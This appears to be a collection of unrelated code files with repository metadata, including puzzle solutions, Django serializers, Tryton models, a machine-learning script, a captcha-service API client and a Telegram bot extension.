            os.startfile(empres_path)
    except sqlite3.Error as e:
        print("Error occurred.", e)
    finally:
        if conn:
            conn.close()
    return
# Demo: create the table, then store and read back one employee record.
# (Paths use Windows-style backslashes; see readBlob's os.startfile note.)
create_table()
employId = 1
name = 'cat'
picture = os.path.join(os.path.dirname(__file__), r"data\employees\picture.jfif")
resume = os.path.join(os.path.dirname(__file__), r"data\employees\resume.jfif")
insertBlob(employId, name, picture, resume)
readBlob()
|
[
"noreply@github.com"
] |
AuroraBoreas.noreply@github.com
|
0c0b62f6266aab1d890fe4d7d07d06120fad7782
|
9fcd6a91132fd12731d259fe7d709cdf222381bb
|
/2022/14/foo.py
|
f620615c11d7f8917af8cb384035406dd2be5cb9
|
[] |
no_license
|
protocol7/advent-of-code
|
f5bdb541d21414ba833760958a1b9d05fc26f84a
|
fa110cef83510d86e82cb5d02f6af5bb7016f2c7
|
refs/heads/master
| 2023-04-05T15:33:26.146031
| 2023-03-18T14:22:43
| 2023-03-18T14:22:43
| 159,989,507
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
import sys
from itertools import *
from util import *
def parse(line):
    # Each input line is a rock path: the integers pair up into (x, y) points.
    return chunks(ints(line), 2)


xs = list(map(parse, sys.stdin))

# Rasterise every rock segment into the set of occupied points `d`.
d = set()
for row in xs:
    for (x1, y1), (x2, y2) in zip(row, row[1:]):
        for x in diffrange(x1, x2):
            for y in diffrange(y1, y2):
                d.add((x, y))

# Lowest rock; the floor for part 2 sits two rows below (maxy + 2), so sand
# resting at maxy + 1 is sitting on the floor.
maxy = max(y for _, y in d)

part1 = True
# Drop one grain of sand per outer-loop iteration; `c` counts grains dropped.
for c in count():
    sx, sy = (500, 0)
    while True:
        if sy == maxy + 1:
            if part1:
                # First grain to fall past the rocks: part 1's answer is the
                # number of grains that came to rest before it.
                print(c)
                part1 = False
            # on bottom floor, rest
            d.add((sx, sy))
            break
        elif (sx, sy+1) not in d:
            # point below is free
            sy += 1
        elif (sx-1, sy+1) not in d:
            # point below and to the left is free
            sx -= 1
            sy += 1
        elif (sx+1, sy+1) not in d:
            # point below and to the right is free
            sx += 1
            sy += 1
        elif (sx, sy) not in d:
            # we can't move down and we haven't fill up all the way, rest here
            d.add((sx, sy))
            break
        else:
            # filled up all the way, we're done with part 2
            print(c)
            sys.exit()
|
[
"niklas@protocol7.com"
] |
niklas@protocol7.com
|
74039f87a612a65381e0ed6e6eed92f1022e8968
|
4e0ff785b993b6bae70745434e61f27ca82e88f0
|
/289-Game-of-Life/solution.py
|
0c90ed85355a13a6e97b67dbdb013dde336eef3d
|
[] |
no_license
|
NobodyWHU/Leetcode
|
2ee557dd77c65c5fa8ca938efb6de3793b4de261
|
d284fa3daab02531e5300867463b293d44737e32
|
refs/heads/master
| 2021-01-23T14:05:28.161062
| 2016-09-23T11:51:51
| 2016-09-23T11:51:51
| 58,898,114
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 998
|
py
|
class Solution(object):
    """LeetCode 289 "Game of Life", computed in place with bit tricks.

    Bit 0 of each cell holds the current state; bit 1 marks cells whose
    state will flip. A final pass applies the flips.

    Fixed for Python 3: the original used `xrange` and
    `lm, ln = map(xrange, [m, n])` — `xrange` does not exist in Python 3,
    and `map` there yields a one-shot iterator, so the second sweep over
    `lm` would have been empty. `range` objects are re-iterable and work
    in both versions.
    """

    def live_nbrs(self, board, i, j, m, n):
        """Count live neighbours of cell (i, j) on an m x n board."""
        ms = max(0, i - 1)
        ns = max(0, j - 1)
        me = min(m, i + 2)
        ne = min(n, j + 2)
        count = 0
        for i1 in range(ms, me):
            for j1 in range(ns, ne):
                if board[i1][j1] & 1:
                    count += 1
        # The 3x3 window includes the cell itself; subtract its own state.
        return count - (board[i][j] & 1)

    def gameOfLife(self, board):
        """
        :type board: List[List[int]]
        :rtype: void Do not return anything, modify board in-place instead.
        """
        m = len(board)
        if not m:
            return
        n = len(board[0])
        lm, ln = range(m), range(n)
        # Pass 1: record the next state in bit 1 without disturbing bit 0.
        for i in lm:
            for j in ln:
                num = self.live_nbrs(board, i, j, m, n)
                if not (board[i][j] & 1):
                    # Dead cell: becomes alive with exactly 3 neighbours.
                    board[i][j] = bool(num == 3) << 1
                else:
                    # Live cell: dies unless it has 2 or 3 neighbours.
                    board[i][j] += bool(num not in [2, 3]) << 1
        # Pass 2: bit 1 marks a state flip; XOR-ing it into bit 0 applies it.
        for i in lm:
            for j in ln:
                board[i][j] = ((board[i][j] & 2) >> 1) ^ (board[i][j] & 1)
|
[
"haohaoranran@126.com"
] |
haohaoranran@126.com
|
d4f48a70ecf3ae87af021116d62c44cd8a0dac42
|
49d9fe8a1c83699e41b9cd4e6764e640e69243a8
|
/ekd_documents_stage.py
|
7fd8bb338614c646298456ea7da30a8793837927
|
[] |
no_license
|
postcoder/ekd_documents
|
11945361052e2052848aa71e6f425c5d9bb92802
|
083e1d37e39803aa9dde69b596bbb9305ec35d7b
|
refs/heads/master
| 2020-12-11T07:39:35.646593
| 2011-03-31T05:25:03
| 2011-03-31T05:25:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,081
|
py
|
# -*- coding: utf-8 -*-
"Document Stage"
from trytond.model import ModelView, ModelSQL, fields
from trytond.transaction import Transaction
class DocumentTemplateStage(ModelSQL, ModelView):
    "Document Template"
    # Tryton model: one workflow stage of a document template.
    # NOTE: the class docstring above is runtime data (_description reads it).
    _name='ekd.document.template.stage'
    _description=__doc__
    _order_name = "sequence"

    template = fields.Many2One('ekd.document.template', 'Template')
    name = fields.Char('Name', size=128)
    shortcut = fields.Char('ShortCut', size=32)
    sequence = fields.Integer('Sequence', help="Change with *10")
    date_start = fields.Date('Date Start')
    date_end = fields.Date('Date end')
    code_call = fields.Char('Code Call')
    active = fields.Boolean('Active')

    def default_active(self):
        # New stages are active unless explicitly deactivated.
        return True

# Old-style Tryton registration: instantiating registers the model in the pool.
DocumentTemplateStage()

class Document(ModelSQL, ModelView):
    # Extends ekd.document.template with the reverse side of the stage link.
    _name='ekd.document.template'

    stages = fields.One2Many('ekd.document.template.stage', 'template', 'Stages')

Document()

class Document(ModelSQL, ModelView):
    # Extends ekd.document with its current stage. The Python name is reused;
    # registration is keyed by _name, so this does not clash with the class above.
    _name='ekd.document'

    stage = fields.Many2One('ekd.document.template.stage', 'Stage')

Document()
|
[
"k-dmitry2@narod.ru"
] |
k-dmitry2@narod.ru
|
17c0559b0457907a1e73225e13128fc0575b7451
|
53164813be4f539d65ef985da732d1890eb91693
|
/company/serializers.py
|
c7f078274e8118c7d9a997dd41d14a109aaeade3
|
[] |
no_license
|
surajmondal1003/erp_tribeni
|
8ea3e19d3afcdeed6e0114de61ba086043d98303
|
1972e7a18853a30ac85c6fa0487fed9dbcef4381
|
refs/heads/master
| 2020-03-19T09:51:34.780672
| 2018-06-29T09:04:25
| 2018-06-29T09:04:25
| 136,322,677
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,474
|
py
|
from company.models import Company,TermsandConditon
from states.models import State
from rest_framework import serializers
from rest_framework.serializers import ModelSerializer
from rest_framework.validators import UniqueValidator
class ChildrenSerializer(serializers.Serializer):
    """Recursive child serializer: renders each child with the owning model
    serializer's class, enabling an arbitrarily deep company tree."""
    def to_representation(self, value):
        # self.parent is the ListSerializer; self.parent.parent is the owning
        # model serializer (e.g. CompanySerializer), whose class we reuse.
        serializer = self.parent.parent.__class__(value, context=self.context)
        return serializer.data


class CompanySerializer(ModelSerializer):
    """Full company representation, including the recursive children tree."""
    # Company names must be globally unique.
    company_name = serializers.CharField(
        validators=[UniqueValidator(queryset=Company.objects.all())]
    )
    # Stamp the requesting user as creator without exposing the field.
    created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
    status=serializers.BooleanField(default=True)
    # Read-only recursive list of child companies (see ChildrenSerializer).
    children=ChildrenSerializer(many=True, read_only=True)
    company_url = serializers.CharField(required=False, allow_blank=True)  # Not mandatory field
    company_gst = serializers.CharField(required=False, allow_blank=True)  # Not mandatory field
    company_pan = serializers.CharField(required=False, allow_blank=True)  # Not mandatory field
    company_cin = serializers.CharField(required=False, allow_blank=True)  # Not mandatory field
    company_email = serializers.EmailField(required=False, allow_blank=True)  # Not mandatory field

    class Meta:
        model = Company
        fields = ['id','parent','company_name','company_url','company_gst','company_pan','company_cin','company_email',
                  'company_address','company_contact','company_state','company_city','company_pin','status','created_at',
                  'created_by','is_deleted','children']


class CompanyListSerializer(ModelSerializer):
    """Minimal company representation for dropdowns/nested references."""
    class Meta:
        model = Company
        fields = ['id','company_name']


class TermsAndConditionSerializer(ModelSerializer):
    """Write-side serializer: `company` is a plain primary-key field."""
    created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
    status = serializers.BooleanField(default=True)

    class Meta:
        model = TermsandConditon
        fields = ['id','company','term_type','term_text','status','created_at','created_by','is_deleted']


class TermsAndConditionReadSerializer(ModelSerializer):
    """Read-side serializer: `company` is expanded via CompanyListSerializer."""
    created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
    status = serializers.BooleanField(default=True)
    company=CompanyListSerializer()

    class Meta:
        model = TermsandConditon
        fields = ['id','company','term_type','term_text','status','created_at','created_by','is_deleted']
|
[
"surajmondal1003@gmail.com"
] |
surajmondal1003@gmail.com
|
a6abacfc9321ad09afffc9432695b4d237820cb0
|
f95d2646f8428cceed98681f8ed2407d4f044941
|
/AI/day03/ai01.py
|
63d018d7e9fa8009a76ae0d7321bc2a6daf4214c
|
[] |
no_license
|
q2806060/python-note
|
014e1458dcfa896f2749c7ebce68b2bbe31a3bf8
|
fbe107d668b44b78ae0094dbcc7e8ff8a4f8c983
|
refs/heads/master
| 2020-08-18T01:12:31.227654
| 2019-10-17T07:40:40
| 2019-10-17T07:40:40
| 215,731,114
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,393
|
py
|
import sklearn.tree as st
import sklearn.ensemble as se
import numpy as np
import sklearn.utils as su
import sklearn.metrics as sm
import matplotlib.pyplot as mp
data = np.loadtxt('C:\\Users\\Administrator\\Desktop\\sucai\\ml_data\\bike_day.csv',
delimiter=',', unpack=False, dtype='U20')
# 获取输入集与输出集
header = data[0, 2:13]
x = np.array(data[1:, 2:13], dtype=float)
y = np.array(data[1:, -1], dtype=float)
# 打乱数据集
x, y = su.shuffle(x, y, random_state=7)
# 查分训练集,测试集
train_size = int(len(x) * 0.9)
train_x, test_x, train_y, test_y = x[:train_size], x[train_size:], y[:train_size], y[train_size:]
# 随机森林模型训练
model = se.RandomForestRegressor(max_depth=10, n_estimators=1000, min_samples_split=2)
model.fit(train_x, train_y)
pred_test_y = model.predict(test_x)
# 使用r2得分验证预测结果
print(sm.r2_score(test_y, pred_test_y))
# 输出特征重要性
fi_day = model.feature_importances_
print(fi_day)
print(header)
# 绘制特征重要性柱状图
mp.figure('Bike', facecolor='lightgray')
mp.subplot(211)
mp.title('Day', fontsize=16)
mp.ylabel("Imporeances", fontsize=12)
mp.tick_params(labelsize=8)
mp.grid(linestyle=':')
pos = np.arange(fi_day.size)
sorted_i = fi_day.argsort()[::-1]
mp.xticks(pos, header[sorted_i])
mp.bar(pos, fi_day[sorted_i], color='dodgerblue', label='Bike_Day')
mp.legend()
mp.show()
|
[
"C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn"
] |
C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn
|
ed34f5a1992dc92768d5c72071118192afc81a60
|
58f095f52d58afa9e8041c69fa903c5a9e4fa424
|
/examples/test_dejong3.py
|
7278675f06b5173756538e602b0627bca01a6010
|
[
"BSD-3-Clause"
] |
permissive
|
cdeil/mystic
|
e41b397e9113aee1843bc78b5b4ca30bd0168114
|
bb30994987f36168b8f09431cb9c3823afd892cd
|
refs/heads/master
| 2020-12-25T23:18:52.086894
| 2014-08-13T14:36:09
| 2014-08-13T14:36:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,742
|
py
|
#!/usr/bin/env python
#
# Author: Patrick Hung (patrickh @caltech)
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2014 California Institute of Technology.
# License: 3-clause BSD. The full license text is available at:
# - http://trac.mystic.cacr.caltech.edu/project/mystic/browser/mystic/LICENSE
"""
Sets up De Jong's Third function. This is problem 3 of testbed 1 in [1].
Note: The function as defined by Eq.8 of [1] seems incomplete.
Reference:
[1] Storn, R. and Price, K. Differential Evolution - A Simple and Efficient
Heuristic for Global Optimization over Continuous Spaces. Journal of Global
Optimization 11: 341-359, 1997.
[2] Storn, R. and Proce, K. Same title as above, but as a technical report.
try: http://www.icsi.berkeley.edu/~storn/deshort1.ps
"""
from mystic.solvers import DifferentialEvolutionSolver
from mystic.termination import ChangeOverGeneration, VTR
from mystic.models.dejong import step as DeJong3
import random
random.seed(123)
ND = 5
NP = 25
MAX_GENERATIONS = 2500
def main():
solver = DifferentialEvolutionSolver(ND, NP)
solver.SetRandomInitialPoints(min = [-5.12]*ND, max = [5.12]*ND)
solver.SetEvaluationLimits(generations=MAX_GENERATIONS)
solver.Solve(DeJong3, termination=VTR(0.00001), \
CrossProbability=0.3, ScalingFactor=1.0)
solution = solver.Solution()
print solution
if __name__ == '__main__':
from timeit import Timer
# optimize with DESolver
t = Timer("main()", "from __main__ import main")
timetaken = t.timeit(number=1)
print "CPU Time: %s\n" % timetaken
# optimize with fmin
from mystic.solvers import fmin
print fmin(DeJong3, [0 for i in range(ND)])
# end of file
|
[
"mmckerns@968178ea-60bd-409e-af13-df8a517b6005"
] |
mmckerns@968178ea-60bd-409e-af13-df8a517b6005
|
d7fd85dcb22795bc5b355d57accac43d35b1e6b2
|
290dfba092f9f88eb62e1b37ea290f01f836acd7
|
/methylation/bicluster_analysis/run_hmf_mtf_store_matrices.py
|
5760d111f9af9bad3f5077e6aed7ebc95ebff383
|
[] |
no_license
|
rintukutum/HMF
|
fb1ce6f76064bef6b9a6fd5cfeaccd16cf624cd6
|
87c1bc73ddc375c56ab101185d7fc1b98df1c1ba
|
refs/heads/master
| 2020-04-04T10:17:11.722275
| 2018-06-10T10:21:36
| 2018-06-10T10:21:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,482
|
py
|
"""
Run the HMF D-MTF method on the methylation datasets, and store the expectation
of the factor matrices F, Sn.
"""
import sys, os
project_location = os.path.dirname(__file__)+"/../../../"
sys.path.append(project_location)
from HMF.code.models.hmf_Gibbs import HMF_Gibbs
from HMF.methylation.load_methylation import filter_driver_genes_std
import numpy
''' Settings HMF '''
iterations, burn_in, thinning = 200, 150, 2 # 1000, 800, 5 #
indices_thinning = range(burn_in,iterations,thinning)
settings = {
'priorF' : 'normal',
'priorSn' : ['normal','normal','normal'],
'orderF' : 'columns',
'orderSn' : ['rows','rows','rows'],
'ARD' : True,
'element_sparsity' : True,
}
hyperparameters = {
'alphatau' : 1,
'betatau' : 1,
'alpha0' : 0.001,
'beta0' : 0.001,
'alphaS' : 1.,
'betaS' : 0.001,
'lambdaF' : 0.1,
}
init = {
'F' : 'kmeans',
'Sn' : 'least',
'lambdat' : 'exp',
'tau' : 'exp'
}
E = ['genes','samples']
K = {'genes':20, 'samples':20}
alpha_n = [1., 1., 1.] # GE, PM, GM
''' Load in data '''
R_ge, R_pm, R_gm, genes, samples = filter_driver_genes_std()
M_ge, M_pm, M_gm = numpy.ones(R_ge.shape), numpy.ones(R_pm.shape), numpy.ones(R_gm.shape)
R = [
(R_ge, M_ge, 'genes', 'samples', alpha_n[0]),
(R_pm, M_pm, 'genes', 'samples', alpha_n[1]),
(R_gm, M_gm, 'genes', 'samples', alpha_n[1]),
]
C, D = [], []
''' Run the Gibbs sampler '''
HMF = HMF_Gibbs(R,C,D,K,settings,hyperparameters)
HMF.initialise(init)
HMF.run(iterations)
''' Store the mean of the matrices. '''
folder = project_location+'HMF/methylation/bicluster_analysis/matrices/'
E_drugs, E_cell_lines = 'genes', 'samples'
n_ge, n_pm, n_gm = 0, 1, 2
exp_F_genes = HMF.approx_expectation_Ft(E=E_drugs, burn_in=burn_in, thinning=thinning)
exp_F_samples = HMF.approx_expectation_Ft(E=E_cell_lines, burn_in=burn_in, thinning=thinning)
exp_S_ge = HMF.approx_expectation_Sn(n=n_ge, burn_in=burn_in, thinning=thinning)
exp_S_pm = HMF.approx_expectation_Sn(n=n_pm, burn_in=burn_in, thinning=thinning)
exp_S_gm = HMF.approx_expectation_Sn(n=n_gm, burn_in=burn_in, thinning=thinning)
numpy.savetxt(fname=folder+'F_genes', X=exp_F_genes)
numpy.savetxt(fname=folder+'F_samples', X=exp_F_samples)
numpy.savetxt(fname=folder+'S_ge', X=exp_S_ge)
numpy.savetxt(fname=folder+'S_pm', X=exp_S_pm)
numpy.savetxt(fname=folder+'S_gm', X=exp_S_gm)
|
[
"tab43@cam.ac.uk"
] |
tab43@cam.ac.uk
|
d95c6a72d162c022ff13a6a9180b38d6dc4d03f7
|
26f8a8782a03693905a2d1eef69a5b9f37a07cce
|
/test/test_destiny_definitions_destiny_item_stat_block_definition.py
|
fd1caacbe42ae8f19d925e97ff45e137b5b68be2
|
[] |
no_license
|
roscroft/openapi3-swagger
|
60975db806095fe9eba6d9d800b96f2feee99a5b
|
d1c659c7f301dcfee97ab30ba9db0f2506f4e95d
|
refs/heads/master
| 2021-06-27T13:20:53.767130
| 2017-08-31T17:09:40
| 2017-08-31T17:09:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
# coding: utf-8
"""
Bungie.Net API
These endpoints constitute the functionality exposed by Bungie.net, both for more traditional website functionality and for connectivity to Bungie video games and their related functionality.
OpenAPI spec version: 2.0.0
Contact: support@bungie.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.destiny_definitions_destiny_item_stat_block_definition import DestinyDefinitionsDestinyItemStatBlockDefinition
class TestDestinyDefinitionsDestinyItemStatBlockDefinition(unittest.TestCase):
""" DestinyDefinitionsDestinyItemStatBlockDefinition unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testDestinyDefinitionsDestinyItemStatBlockDefinition(self):
"""
Test DestinyDefinitionsDestinyItemStatBlockDefinition
"""
# FIXME: construct object with mandatory attributes with example values
#model = swagger_client.models.destiny_definitions_destiny_item_stat_block_definition.DestinyDefinitionsDestinyItemStatBlockDefinition()
pass
if __name__ == '__main__':
unittest.main()
|
[
"adherrling@gmail.com"
] |
adherrling@gmail.com
|
e42222439cae23f5147a01df166ec8da65f2e33b
|
4de0c6d3a820d7669fcef5fd035416cf85b35f23
|
/ITcoach/爬虫课件/第五章:requests模块高级/CodeClass.py
|
74cf4cb614e8aae221e9f0d2e98fadb407dfbb64
|
[
"AFL-3.0"
] |
permissive
|
ww35133634/chenxusheng
|
5e1b7391a94387b73bcd7c4d12f1247b79be8016
|
666e0eb3aedde46342faf0d4030f5c72b10c9732
|
refs/heads/master
| 2022-11-12T03:46:47.953680
| 2020-07-02T20:50:56
| 2020-07-02T20:50:56
| 275,168,080
| 0
| 0
|
AFL-3.0
| 2020-07-02T20:58:37
| 2020-06-26T13:54:48
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,265
|
py
|
import http.client, mimetypes, urllib, json, time, requests
######################################################################
class YDMHttp:
apiurl = 'http://api.yundama.com/api.php'
username = ''
password = ''
appid = ''
appkey = ''
def __init__(self, username, password, appid, appkey):
self.username = username
self.password = password
self.appid = str(appid)
self.appkey = appkey
def request(self, fields, files=[]):
response = self.post_url(self.apiurl, fields, files)
response = json.loads(response)
return response
def balance(self):
data = {'method': 'balance', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['balance']
else:
return -9001
def login(self):
data = {'method': 'login', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['uid']
else:
return -9001
def upload(self, filename, codetype, timeout):
data = {'method': 'upload', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey, 'codetype': str(codetype), 'timeout': str(timeout)}
file = {'file': filename}
response = self.request(data, file)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['cid']
else:
return -9001
def result(self, cid):
data = {'method': 'result', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey, 'cid': str(cid)}
response = self.request(data)
return response and response['text'] or ''
def decode(self, filename, codetype, timeout):
cid = self.upload(filename, codetype, timeout)
if (cid > 0):
for i in range(0, timeout):
result = self.result(cid)
if (result != ''):
return cid, result
else:
time.sleep(1)
return -3003, ''
else:
return cid, ''
def report(self, cid):
data = {'method': 'report', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey, 'cid': str(cid), 'flag': '0'}
response = self.request(data)
if (response):
return response['ret']
else:
return -9001
def post_url(self, url, fields, files=[]):
for key in files:
files[key] = open(files[key], 'rb');
res = requests.post(url, files=files, data=fields)
return res.text
|
[
"82516351@qq.com"
] |
82516351@qq.com
|
1defa08cad2feb8f0a409a161b01ac1c0c65ac80
|
bf6329ef922505a5c8c4797d6011e81295b753ad
|
/extensions/ban_my_self.py
|
0b5f77f80215955f3d893588af9b7870b1d9bb37
|
[] |
no_license
|
Xi-Plus/Ethics-Committee
|
b4ed9077bc4113a8d42caf55198b78e3bb18c8bf
|
cd79dfc5b936b80ac8250f61261d45ad95a4fc55
|
refs/heads/master
| 2023-08-30T21:29:21.782947
| 2023-08-20T09:20:47
| 2023-08-20T09:20:47
| 134,817,641
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,642
|
py
|
import re
import time
import telegram
from Kamisu66 import EthicsCommitteeExtension
class BanMySelf(EthicsCommitteeExtension): # pylint: disable=W0223
MODULE_NAME = 'ban_my_self'
COMMAND = r'^/banmyself@Kamisu66EthicsCommitteeBot$'
DURATION = 60
def __init__(self, enabled_chat_id):
self.enabled_chat_id = enabled_chat_id
def main(self, EC):
update = EC.update
if update.effective_chat.id not in self.enabled_chat_id:
return
if not update.message or not update.message.text:
return
if re.search(self.COMMAND, update.message.text):
EC.bot.delete_message(update.effective_chat.id, update.message.message_id)
chatMember = update.effective_chat.get_member(update.effective_user.id)
if chatMember.status not in [chatMember.ADMINISTRATOR, chatMember.CREATOR]:
try:
until_date = until_date = int(time.time() + self.DURATION)
EC.bot.ban_chat_member(
chat_id=update.effective_chat.id,
user_id=update.effective_user.id,
until_date=until_date,
)
except telegram.error.BadRequest as e:
EC.log('[ban_my_self] restrict {} in {} failed: {}'.format(
update.effective_user.id, update.effective_chat.id, e.message))
else:
EC.log('[ban_my_self] skip restrict {} in {}'.format(
update.effective_user.id, update.effective_chat.id))
def __mainclass__():
return BanMySelf
|
[
"huangxuanyuxiplus@gmail.com"
] |
huangxuanyuxiplus@gmail.com
|
6bada32e456c251b91a0d28e117d3aca206621b0
|
cefab48dff8fc40786f0a45f3df272646365e9f5
|
/python/pyMARS_old/python_mars_scripts2a/delete_files.py
|
88f6d9bb47f4e0691b88aa8e27a717a6af9434ba
|
[] |
no_license
|
shaunhaskey/pyMARS
|
d40265bd2d445f0429ae7177f2e75d83f0ba8b30
|
e2424088492a8ab2f34acf62db42a77e44d5bc3b
|
refs/heads/master
| 2020-12-25T17:24:28.392539
| 2016-08-01T22:14:27
| 2016-08-01T22:14:27
| 17,684,575
| 0
| 0
| null | 2014-03-13T03:41:59
| 2014-03-12T21:21:08
|
Python
|
UTF-8
|
Python
| false
| false
| 1,194
|
py
|
import numpy as num
import time, os, sys, string, re, csv, pickle
import scipy.interpolate as interpolate
from matplotlib.mlab import griddata
################ SET THESE BEFORE RUNNING!!!!########
project_dir = '/scratch/haskeysr/mars/project1_new_eq/'
pickle_file_name = '9_project1_new_eq_COIL_upper_post_setup_new_low_beta2.pickle'
#folders = 'RUNrfa_FEEDI-120.p RUNrfa_FEEDI-120.vac RUNrfa_FEEDI-240.p RUNrfa_FEEDI-240.vac RUNrfa_FEEDI-60.p RUNrfa_FEEDI-60.vac'
folders = 'OUTRMAR OUTVMAR'
##################################
#Open previous data structure
pickle_file = open(pickle_file_name,'r')
project_dict = pickle.load(pickle_file)
pickle_file.close()
total = len(project_dict['sims'].keys())
count = 0
fails = 0
for current in project_dict['sims'].keys():
original_chease_dir = project_dict['sims'][current]['dir_dict']['chease_dir']
chease_pest_dir = original_chease_dir[:-1]+'_PEST/'
print chease_pest_dir
try:
os.chdir(chease_pest_dir)
string_command = 'rm '+ folders
os.system(string_command)
except:
fails += 1
print 'dir not found'
print 'finished %d of %d,fails %d'%(count,total,fails)
count += 1
|
[
"shaunhaskey@gmail.com"
] |
shaunhaskey@gmail.com
|
3227d0444c8e269c7a4c93dd6a9209005345f469
|
f67b772f58bf153f76dab5521f982d01dc57c12b
|
/permission.py
|
4d8840f6aae8bab09699845a5b79ed461fa3b87a
|
[] |
no_license
|
culibraries/ark-django-app
|
5eddb5f2bd5057a81d100eddb549a15e86852f28
|
355527ce36770c0d27dcf6c524154ac45b9d6e83
|
refs/heads/main
| 2023-02-24T05:08:12.421615
| 2020-09-21T20:34:41
| 2020-09-21T20:34:41
| 287,331,709
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
from rest_framework import permissions
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import Permission
class arkPermission(permissions.BasePermission):
def has_permission(self, request, view):
if request.method in permissions.SAFE_METHODS:
return True
else:
if request.user and request.user.groups.filter(name='ark-admin'):
return True
return False
|
[
"mbstacy@gmail.com"
] |
mbstacy@gmail.com
|
016c2124a86821c015a56c70460990d39129c536
|
384fc08ee847e186a6f2e555a930d6d175728ee2
|
/scripts/disp_client.py
|
6f77e04f574be90f725dcbe9556b503a7957f313
|
[] |
no_license
|
mrmh2/scaleca
|
ae2d1ada7b8ea423d2c1e1b44787d31347d5bfbd
|
4374dc5e6d09eeb4ce3ceea51a0a9e7b50dabbfe
|
refs/heads/master
| 2021-03-12T22:48:26.945721
| 2013-08-27T14:24:19
| 2013-08-27T14:24:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,389
|
py
|
#!/usr/bin/env python
"""disp_client.py - simple text display client.
Connects to server, then constructs simple update loop which sends a command to
the server to run a simulation timestep, then displays the results."""
import os
import sys
import zmq
import numpy as np
def setup():
parent, cdir = os.path.split(os.path.dirname(__file__))
sys.path.append(parent)
from scaleca.disp_simple import CADisplay
globals()['CADisplay'] = CADisplay
def connect_to_server(port):
context = zmq.Context()
#print "Connecting to server..."
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:%s" % port)
return socket
def string_state_to_array(sstate, shape):
c_sep = ','.join(sstate)
one_d = np.fromstring(c_sep, dtype=np.uint8, sep=',')
return one_d.reshape(shape)
def unpack_string_rep(sstate):
dim, astring = sstate.split(':')
shape = map(int, dim.split(','))
astate = string_state_to_array(astring, shape)
return astate
def make_update_loop(socket):
def update_loop():
socket.send('RUN')
message = socket.recv()
return unpack_string_rep(message)
return update_loop
def main():
setup()
port = "5556"
socket = connect_to_server(port)
ul = make_update_loop(socket)
display = CADisplay()
display.run_display(ul)
if __name__ == '__main__':
main()
|
[
"mhartley@cantab.net"
] |
mhartley@cantab.net
|
7af3d393b2ab28233d6337137cf6f36f1ad5421a
|
a12c090eb57da4c8e1f543a1a9d497abad763ccd
|
/django-stubs/conf/urls/i18n.pyi
|
92bedee797dfd45df0608d28ec4edc703e475012
|
[
"BSD-3-Clause"
] |
permissive
|
debuggerpk/django-stubs
|
be12eb6b43354a18675de3f70c491e534d065b78
|
bbdaebb244bd82544553f4547157e4f694f7ae99
|
refs/heads/master
| 2020-04-04T08:33:52.358704
| 2018-09-26T19:32:19
| 2018-09-26T19:32:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
pyi
|
from typing import Any, List, Optional, Tuple, Union
from django.urls.resolvers import URLPattern, URLResolver
def i18n_patterns(
*urls: Any, prefix_default_language: bool = ...
) -> Union[List[List[Any]], List[URLPattern], List[URLResolver]]: ...
def is_language_prefix_patterns_used(urlconf: str) -> Tuple[bool, bool]: ...
urlpatterns: Any
|
[
"maxim.kurnikov@gmail.com"
] |
maxim.kurnikov@gmail.com
|
591625010b059b7a1ee63a7bc597dfa5a0166c26
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02733/s001901229.py
|
aba6fbc1ebc1dcab87ce5d60ec89617753016b1a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,527
|
py
|
import math
#import numpy as np
import queue
from collections import deque,defaultdict
import heapq as hpq
import itertools
from sys import stdin,setrecursionlimit
#from scipy.sparse.csgraph import dijkstra
#from scipy.sparse import csr_matrix
ipt = stdin.readline
setrecursionlimit(10**7)
def main():
h,w,k = map(int,ipt().split())
s = [list(map(int,list(input()))) for _ in [0]*h]
'''
sms = [[0]*w for _ in [0]*h]
for i in range(w):
for j in range(h):
sms[j][i] = sms[j-1][i]+s[j][i]
print(i)
'''
cmi = 10**18
for i in range(2**(h-1)):
pos = [0]*h
